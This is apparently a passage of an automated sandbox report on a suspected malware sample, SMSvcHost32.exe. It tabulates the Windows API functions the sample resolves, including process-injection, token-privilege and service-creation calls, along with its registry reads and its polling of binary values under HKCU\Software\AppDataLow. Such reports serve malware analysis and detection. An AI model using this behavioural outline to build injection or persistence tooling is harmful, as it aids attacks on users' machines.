| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x765e2730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x765baba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x765c66f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x765c7b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x765bd290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x765bf5a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeThread, address_out = 0x765c4f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x765e2850 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x765bafe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x765c6770 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x765b2ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageA, address_out = 0x765bf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x765b7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x765c6a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Module | Get Handle | module_name = Secur32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x6ff60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Module | Get Handle | module_name = SHELL32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = 680, address_out = 0x753cdb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Module | Get Handle | module_name = ole32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x771d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 |
Thread 0x560
653
5
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Module | Get Filename | module_name = ole32.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
2 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualQuery, address_out = 0x765b7a90 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId, data = 164 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 63 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcess, address_out = 0x779d6f00 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcessToken, address_out = 0x779d7e10 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwQueryInformationToken, address_out = 0x779d6eb0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
5 | |
| System | Get Time | type = Ticks, time = 153500 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_NONE |
|
1 | |
| System | Sleep | duration = 500 milliseconds (0.500 seconds) |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_4, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
